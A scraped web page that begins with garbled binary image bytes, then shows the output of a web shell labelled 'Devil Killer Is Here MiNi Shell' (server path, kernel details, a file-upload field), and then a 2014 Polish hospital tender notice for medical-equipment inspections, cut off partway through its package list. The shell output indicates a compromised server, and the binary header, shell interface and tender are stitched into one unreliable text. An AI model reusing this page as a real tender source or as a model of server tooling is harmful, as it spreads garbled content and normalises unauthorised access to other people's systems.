JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/128425-N-2014.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Świadczenie usług w zakresie przeglądów aparatury i sprzętu medycznego znajdujących się na wyposażeniu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu - Zdroju (powtórka) - DZP/38/382-30/14</b><br>
<b>Numer ogłoszenia: 128425 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu Zdroju , al. Jana Pawła II 7, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 32 47 84 200, faks 32 47 84 506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wss2.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przeglądów aparatury i sprzętu medycznego znajdujących się na wyposażeniu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu - Zdroju (powtórka) - DZP/38/382-30/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie przeglądów aparatury i sprzętu medycznego znajdujących się na wyposażeniu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu - Zdroju.
Wykaz aparatury i sprzętu medycznego objętego zamówieniem, zakres prac oraz terminy ich wykonania zawiera Załącznik nr 1 do SIWZ (Formularz cenowy).
Przedmiot zamówienia został podzielony na 20 części (pakietów).
Przedmiot zamówienia winien być wykonywany zgodnie z obowiązującymi przepisami na terenie Rzeczypospolitej Polskiej, w szczególności z przepisami ustawy z dnia 20.05.2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679).
Realizacja umowy odbywać się będzie zgodnie z rzeczywistymi potrzebami Zamawiającego.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety.
Zamawiający nie dopuszcza możliwości składania ofert częściowych w ramach ustalonych pakietów na poszczególne pozycje asortymentowe.
Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie zamierza wybierać najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie obowiązuje.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży potwierdzenie producenta aparatury/sprzętu medycznej/medycznego, na przegląd której/którego została złożona oferta, iż Wykonawca jest autoryzowaną firmą uprawnioną do obsługi aparatury/sprzętu medycznej/medycznego, na przegląd której/którego została złożona oferta</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże wykonanie,
a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- Pakiet 1 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy lasera okulistycznego, tomografu komputerowego i mikroskopów operacyjnych firmy CARL ZEISS o wartości co najmniej 3 376,35 zł brutto;
- Pakiet 2 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy respiratorów, zestawu transportowego i zestawów do terapii tlenkiem azotu firmy DUTCHMED o wartości co najmniej 18 117,90 zł brutto;
- Pakiet 3 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy respiratorów pediatrycznych firmy HAMILTON MEDICAL o wartości co najmniej 2 214,00 zł brutto;
- Pakiet 4 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy respiratorów Inspiration firmy eVent Medical Ltd. Galway o wartości co najmniej 984,00 zł brutto;
- Pakiet 5 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatu do USG firmy B-K MEDICAL o wartości co najmniej 1 107,00 zł brutto;
- Pakiet 6 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatu do USG firmy ECHOSON o wartości co najmniej 1 045,50 zł brutto;
- Pakiet 7 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatów do USG firmy MEDISON o wartości co najmniej 3 357,90 zł brutto;
- Pakiet 8 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatu do USG firmy TOSHIBA o wartości co najmniej 4 920,00 zł brutto;
- Pakiet 9 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy sterylizatorów parowych, wytwornic pary i myjki endoskopowej firmy MMM Group o wartości co najmniej 24 538,50 zł brutto;
- Pakiet 10 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy diatermii chirurgicznych firmy Valleyab, przystawki argonowej firmy Valleyab, termometrów elektronicznych firmy Tyco i monitorów głębokości snu firmy COVIDIEN o wartości co najmniej 9 939,63 zł brutto;
- Pakiet 11 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatów do znieczulenia ogólnego, parowników, centrali intensywnego nadzoru, monitorów, ekranów kopiujących, respiratorów stacjonarnych, transportowych i BEBYLOG 8000, inkubatorów intensywnej terapii noworodka i pomp infuzyjnych firmy DRÄGER o wartości co najmniej 56 272,50 zł brutto;
- Pakiet 12 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy kolumn anestezjologicznych i chirurgicznych firmy Kendromed, lamp operacyjnych jednokopułowych i dwukopułowych firmy BERTCHOLD o wartości co najmniej 11 124,12 zł brutto;
- Pakiet 13 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy wag niemowlęcych, medycznych i krzesełkowej o wartości co najmniej 7 921,20 zł brutto;
- Pakiet 14 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy przewoźnego aparatu RTG firmy SHIMADZU o wartości co najmniej 1 537,50 zł brutto;
- Pakiet 15 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy przewoźnego aparatu RTG firmy KOSMED o wartości co najmniej 1 722,00 zł brutto;
- Pakiet 16 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy przewoźnego aparatu RTG firmy SIEMENS o wartości co najmniej 1 230,00 zł brutto;
- Pakiet 17 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy aparatu dopplerowskiego firmy POLEMS o wartości co najmniej 1 722,00 zł brutto;
- Pakiet 18 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy videogastroskopu, videoduodenoskopu, fiberobronchoskopu i videokolonoskopów firmy PENTAX o wartości co najmniej 1 845,00 zł brutto;
- Pakiet 19 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy stołów operacyjnych firmy STERIS o wartości co najmniej 5 367,22 zł brutto;
- Pakiet 20 - minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. przeglądy inkubatorów otwartych firmy UNIMED o wartości co najmniej 2 355,45 zł brutto;
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów (według Załącznika nr 4 do SIWZ); do wykazu należy dołączyć dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie na temat kwalifikacji i doświadczenia zawodowego osób wykonujących przeglądy aparatury i sprzętu medycznego (według Załącznika nr 5 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) potwierdzenie producenta aparatury/sprzętu medycznej/medycznego, na przegląd której/którego została złożona oferta, iż Wykonawca jest autoryzowaną firmą uprawnioną do obsługi aparatury/sprzętu medycznej/medycznego, na przegląd której/którego została złożona oferta; 2) oświadczenie na temat kwalifikacji i doświadczenia zawodowego osób wykonujących przeglądy aparatury i sprzętu medycznego (według Załącznika nr 5 do SIWZ); 3) wypełniony Formularz cenowy zgodny w treści z wzorem stanowiącym Załącznik nr 1 do SIWZ; 4) wypełniony Formularz oferty wraz z oświadczeniem o zapoznaniu się z treścią specyfikacji i wzorem umowy, o związaniu z ofertą - zgodny w treści z wzorem stanowiącym Załącznik nr 2 do SIWZ; 5) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika zakres, podpisane przez osoby uprawnione do reprezentowania Firmy (jeżeli Wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika jak w pkt 7. i 8. SIWZ); 6) pisemne zobowiązanie do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (przykładowy wzór - Załącznik nr 6 do SIWZ) UWAGA: Pełnomocnictwo i pisemne zobowiązanie powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przez okres obowiązywania umowy obowiązywać będzie niezmienność cen za wyjątkiem:
1) zmiany ilości aparatury/sprzętu wymienionej/wymienionego w Załączniku nr 1 do umowy w przypadku wycofania aparatury/sprzętu z eksploatacji, kasacji starej/starego aparatury/sprzętu;
2) sytuacji, gdy w związku ze zmianą przepisów prawa zmianie ulegnie stawka podatku VAT, Zamawiający dopuszcza zmiany wynagrodzenia o kwotę brutto wynikającą ze zmienionej obowiązującej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wss2.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny nr 2 Al. Jana Pawła II 7, 44-330 Jastrzębie-Zdrój Dział Zamówień Publicznych i Zaopatrzenia, XI piętro pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny nr 2 Al. Jana Pawła II 7, 44-330 Jastrzębie-Zdrój, Sekretariat Szpitala, piętro I, pokój A1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeglądy lasera okulistycznego, tomografu komputerowego i mikroskopów operacyjnych firmy CARL ZEISS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeglądy respiratorów, zestawu transportowego i zestawów do terapii tlenkiem azotu firmy DUTCHMED.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeglądy respiratorów pediatrycznych firmy HAMILTON MEDICAL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeglądy respiratorów Inspiration firmy eVent Medical Ltd. Galway.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeglądy aparatu do USG firmy B-K MEDICAL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeglądy aparatu do USG firmy ECHOSON.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeglądy aparatów do USG firmy MEDISON.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeglądy aparatu do USG firmy TOSHIBA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeglądy sterylizatorów parowych, wytwornic pary i myjki endoskopowej firmy MMM Group.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeglądy diatermii chirurgicznych firmy Valleyab, przystawki argonowej firmy Valleyab, termometrów elektronicznych firmy Tyco i monitorów głębokości snu firmy COVIDIEN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
